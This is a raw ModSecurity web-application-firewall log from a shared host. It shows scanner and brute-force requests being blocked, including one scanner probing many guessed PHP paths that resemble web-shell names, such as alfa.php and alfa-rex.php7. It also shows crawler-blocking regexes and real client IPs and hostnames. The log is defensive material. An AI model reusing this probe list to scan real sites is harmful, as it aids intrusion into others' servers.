[Tue May 26 16:12:15.549755 2026] [security2:error] [pid 773493:tid 773738] [client 20.196.127.68:13315] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/xx.php"] [unique_id "ahV5B5gy-Vk4jSdqTCRXPgAAAPg"]
[Tue May 26 16:12:16.376170 2026] [security2:error] [pid 773493:tid 773709] [client 20.196.127.68:17478] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/xmlrpc.php"] [unique_id "ahV5CJgy-Vk4jSdqTCRXTwAAANs"]
[Tue May 26 16:12:17.024712 2026] [security2:error] [pid 773493:tid 773710] [client 20.196.127.68:16167] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/y.php"] [unique_id "ahV5CZgy-Vk4jSdqTCRXawAAANw"]
[Tue May 26 16:12:17.394024 2026] [security2:error] [pid 773493:tid 773672] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5CJgy-Vk4jSdqTCRXZAAAALY"]
[Tue May 26 16:12:18.189302 2026] [security2:error] [pid 773493:tid 773654] [client 114.119.155.228:35177] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahV5Cpgy-Vk4jSdqTCRXgAAAAKQ"], referer: http://haddingtonwines.com/cart?remove_item=6d4f95bf53bba28f148641c8561dbf98
[Tue May 26 16:12:20.016200 2026] [security2:error] [pid 773493:tid 773748] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5C5gy-Vk4jSdqTCRXnwAAAQI"]
[Tue May 26 16:12:20.169883 2026] [security2:error] [pid 773493:tid 773624] [client 20.205.111.246:11699] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/100.php"] [unique_id "ahV5DJgy-Vk4jSdqTCRXrAAAAIY"]
[Tue May 26 16:12:20.876621 2026] [security2:error] [pid 773493:tid 773696] [client 20.205.111.246:9732] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/222.php"] [unique_id "ahV5DJgy-Vk4jSdqTCRXwgAAAM4"]
[Tue May 26 16:12:21.222118 2026] [security2:error] [pid 773493:tid 773642] [client 185.191.171.10:12976] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/february-7th/day/2023-10-10/"] [unique_id "ahV5DZgy-Vk4jSdqTCRX1AAAAJg"]
[Tue May 26 16:12:21.222299 2026] [security2:error] [pid 773493:tid 773642] [client 185.191.171.10:12976] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/february-7th/day/2023-10-10/"] [unique_id "ahV5DZgy-Vk4jSdqTCRX1AAAAJg"]
[Tue May 26 16:12:21.560373 2026] [security2:error] [pid 773493:tid 773717] [client 20.205.111.246:2432] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/adminfuns.php"] [unique_id "ahV5DZgy-Vk4jSdqTCRX3AAAAOM"]
[Tue May 26 16:12:21.683922 2026] [security2:error] [pid 773493:tid 773652] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5DZgy-Vk4jSdqTCRX0wAAAKI"]
[Tue May 26 16:12:21.991248 2026] [security2:error] [pid 773493:tid 773564] [remote 45.79.189.31:33454] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.189.79.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahV5DZgy-Vk4jSdqTCRX4QAA30Y"]
[Tue May 26 16:12:22.236220 2026] [security2:error] [pid 773493:tid 773623] [client 20.205.111.246:8432] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/abcd.php"] [unique_id "ahV5Dpgy-Vk4jSdqTCRX7AAAAIU"]
[Tue May 26 16:12:22.286611 2026] [security2:error] [pid 773493:tid 773742] [client 216.73.217.138:19178] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahV5DZgy-Vk4jSdqTCRX4AAA_Gg"]
[Tue May 26 16:12:22.785453 2026] [security2:error] [pid 773493:tid 773703] [client 106.219.85.83:25074] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5Dpgy-Vk4jSdqTCRX_wAAANU"]
[Tue May 26 16:12:22.785594 2026] [security2:error] [pid 773493:tid 773703] [client 106.219.85.83:25074] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5Dpgy-Vk4jSdqTCRX_wAAANU"]
[Tue May 26 16:12:22.996570 2026] [security2:error] [pid 773493:tid 773683] [client 20.205.111.246:11716] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/al.php"] [unique_id "ahV5Dpgy-Vk4jSdqTCRYBwAAAME"]
[Tue May 26 16:12:23.067296 2026] [security2:error] [pid 773493:tid 773712] [client 202.46.68.231:50632] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "mosykay.com"] [uri "/wp-comments-post.php"] [unique_id "ahV5Dpgy-Vk4jSdqTCRX_gAAAN4"]
[Tue May 26 16:12:23.664768 2026] [security2:error] [pid 773493:tid 773636] [client 20.205.111.246:11774] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/alfa.php"] [unique_id "ahV5D5gy-Vk4jSdqTCRYGwAAAJI"]
[Tue May 26 16:12:23.700344 2026] [security2:error] [pid 773493:tid 773712] [client 202.46.68.231:50632] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "mosykay.com"] [uri "/wp-comments-post.php"] [unique_id "ahV5Dpgy-Vk4jSdqTCRX_gAAAN4"]
[Tue May 26 16:12:23.700385 2026] [security2:error] [pid 773493:tid 773712] [client 202.46.68.231:50632] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "mosykay.com"] [uri "/wp-comments-post.php"] [unique_id "ahV5Dpgy-Vk4jSdqTCRX_gAAAN4"]
[Tue May 26 16:12:24.239168 2026] [security2:error] [pid 773493:tid 773722] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5D5gy-Vk4jSdqTCRYJgAAAOg"]
[Tue May 26 16:12:24.267503 2026] [security2:error] [pid 773493:tid 773501] [remote 54.38.29.86:40796] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/wp-login.php"] [unique_id "ahV5EJgy-Vk4jSdqTCRYLQAA4wc"]
[Tue May 26 16:12:24.351338 2026] [security2:error] [pid 773493:tid 773623] [client 20.205.111.246:3365] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/as.php"] [unique_id "ahV5EJgy-Vk4jSdqTCRYLgAAAIU"]
[Tue May 26 16:12:25.002329 2026] [security2:error] [pid 773493:tid 773640] [client 20.205.111.246:3381] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/aa.php"] [unique_id "ahV5EZgy-Vk4jSdqTCRYPAAAAJY"]
[Tue May 26 16:12:25.209651 2026] [security2:error] [pid 773493:tid 773627] [client 103.44.52.196:48732] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5EZgy-Vk4jSdqTCRYPQAAAIk"]
[Tue May 26 16:12:25.209872 2026] [security2:error] [pid 773493:tid 773627] [client 103.44.52.196:48732] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5EZgy-Vk4jSdqTCRYPQAAAIk"]
[Tue May 26 16:12:25.759183 2026] [security2:error] [pid 773493:tid 773698] [client 20.205.111.246:4613] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/abc.php"] [unique_id "ahV5EZgy-Vk4jSdqTCRYSwAAANA"]
[Tue May 26 16:12:25.774125 2026] [security2:error] [pid 773493:tid 773665] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5EZgy-Vk4jSdqTCRYQwAAAK8"]
[Tue May 26 16:12:26.469808 2026] [security2:error] [pid 773493:tid 773654] [client 20.205.111.246:8414] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/av.php"] [unique_id "ahV5Epgy-Vk4jSdqTCRYYQAAAKQ"]
[Tue May 26 16:12:27.142919 2026] [security2:error] [pid 773493:tid 773730] [client 20.205.111.246:3340] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/autoload_classmap.php"] [unique_id "ahV5E5gy-Vk4jSdqTCRYawAAAPA"]
[Tue May 26 16:12:27.871842 2026] [security2:error] [pid 773493:tid 773711] [client 20.205.111.246:6207] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/asus.php"] [unique_id "ahV5E5gy-Vk4jSdqTCRYfAAAAN0"]
[Tue May 26 16:12:28.136295 2026] [security2:error] [pid 773493:tid 773680] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5E5gy-Vk4jSdqTCRYegAAAL4"]
[Tue May 26 16:12:28.537198 2026] [security2:error] [pid 773493:tid 773686] [client 20.205.111.246:3380] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahV5FJgy-Vk4jSdqTCRYiAAAAMQ"]
[Tue May 26 16:12:28.955898 2026] [security2:error] [pid 773493:tid 773676] [client 114.119.133.83:31221] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.wrapmachines.com"] [uri "/ajax/captcha_code_file.php"] [unique_id "ahV5FJgy-Vk4jSdqTCRYlAAAALo"], referer: http://www.wrapmachines.com/products-view.php?ref=c81e728d9d4c2f636f067f89cc14862c
[Tue May 26 16:12:29.247116 2026] [security2:error] [pid 773493:tid 773732] [client 20.205.111.246:8388] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/atomlib.php"] [unique_id "ahV5FZgy-Vk4jSdqTCRYlgAAAPI"]
[Tue May 26 16:12:29.740366 2026] [security2:error] [pid 773493:tid 773719] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5FZgy-Vk4jSdqTCRYnwAAAOU"]
[Tue May 26 16:12:29.918827 2026] [security2:error] [pid 773493:tid 773687] [client 20.205.111.246:11055] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/alfa-rex.php7"] [unique_id "ahV5FZgy-Vk4jSdqTCRYtgAAAMU"]
[Tue May 26 16:12:30.621184 2026] [security2:error] [pid 773493:tid 773686] [client 20.205.111.246:11994] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/b.php"] [unique_id "ahV5Fpgy-Vk4jSdqTCRY0gAAAMQ"]
[Tue May 26 16:12:31.080110 2026] [security2:error] [pid 773493:tid 773588] [remote 178.104.90.233:57942] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.90.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahV5Fpgy-Vk4jSdqTCRY3QAA7F4"]
[Tue May 26 16:12:31.290328 2026] [security2:error] [pid 773493:tid 773741] [client 20.205.111.246:3154] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/buy.php"] [unique_id "ahV5F5gy-Vk4jSdqTCRY6wAAAPs"]
[Tue May 26 16:12:32.015993 2026] [security2:error] [pid 773493:tid 773665] [client 20.205.111.246:6145] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/bless.php"] [unique_id "ahV5GJgy-Vk4jSdqTCRZBgAAAK8"]
[Tue May 26 16:12:32.129192 2026] [security2:error] [pid 773493:tid 773667] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5F5gy-Vk4jSdqTCRY_AAAALE"]
[Tue May 26 16:12:32.752943 2026] [security2:error] [pid 773493:tid 773731] [client 20.205.111.246:8444] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/class-t.api.php"] [unique_id "ahV5GJgy-Vk4jSdqTCRZDQAAAPE"]
[Tue May 26 16:12:33.403856 2026] [security2:error] [pid 773493:tid 773685] [client 106.219.85.83:20371] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5GZgy-Vk4jSdqTCRZHwAAAMM"]
[Tue May 26 16:12:33.403958 2026] [security2:error] [pid 773493:tid 773685] [client 106.219.85.83:20371] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5GZgy-Vk4jSdqTCRZHwAAAMM"]
[Tue May 26 16:12:33.470645 2026] [security2:error] [pid 773493:tid 773630] [client 20.205.111.246:3141] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/cache.php"] [unique_id "ahV5GZgy-Vk4jSdqTCRZIQAAAIw"]
[Tue May 26 16:12:33.823793 2026] [security2:error] [pid 773493:tid 773650] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5GZgy-Vk4jSdqTCRZHAAAAJI"]
[Tue May 26 16:12:34.171184 2026] [security2:error] [pid 773493:tid 773710] [client 20.205.111.246:10070] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/content.php"] [unique_id "ahV5Gpgy-Vk4jSdqTCRZMQAAANw"]
[Tue May 26 16:12:34.832239 2026] [security2:error] [pid 773493:tid 773677] [client 20.205.111.246:6149] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/classwithtostring.php"] [unique_id "ahV5Gpgy-Vk4jSdqTCRZRAAAALs"]
[Tue May 26 16:12:35.508092 2026] [security2:error] [pid 773493:tid 773714] [client 20.205.111.246:2198] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/css.php"] [unique_id "ahV5G5gy-Vk4jSdqTCRZVQAAAOA"]
[Tue May 26 16:12:35.684558 2026] [security2:error] [pid 773493:tid 773718] [client 103.44.52.196:33266] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5G5gy-Vk4jSdqTCRZWQAAAOQ"]
[Tue May 26 16:12:35.684701 2026] [security2:error] [pid 773493:tid 773718] [client 103.44.52.196:33266] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5G5gy-Vk4jSdqTCRZWQAAAOQ"]
[Tue May 26 16:12:35.871752 2026] [security2:error] [pid 773493:tid 773630] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5G5gy-Vk4jSdqTCRZUQAAAIw"]
[Tue May 26 16:12:36.201800 2026] [security2:error] [pid 773493:tid 773692] [client 20.205.111.246:11018] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/chosen.php"] [unique_id "ahV5HJgy-Vk4jSdqTCRZYAAAAMo"]
[Tue May 26 16:12:36.553103 2026] [security2:error] [pid 773493:tid 773740] [client 202.46.68.231:50772] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "mosykay.com"] [uri "/wp-comments-post.php"] [unique_id "ahV5HJgy-Vk4jSdqTCRZagAAAPo"]
[Tue May 26 16:12:36.792902 2026] [security2:error] [pid 773493:tid 773740] [client 202.46.68.231:50772] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "mosykay.com"] [uri "/wp-comments-post.php"] [unique_id "ahV5HJgy-Vk4jSdqTCRZagAAAPo"]
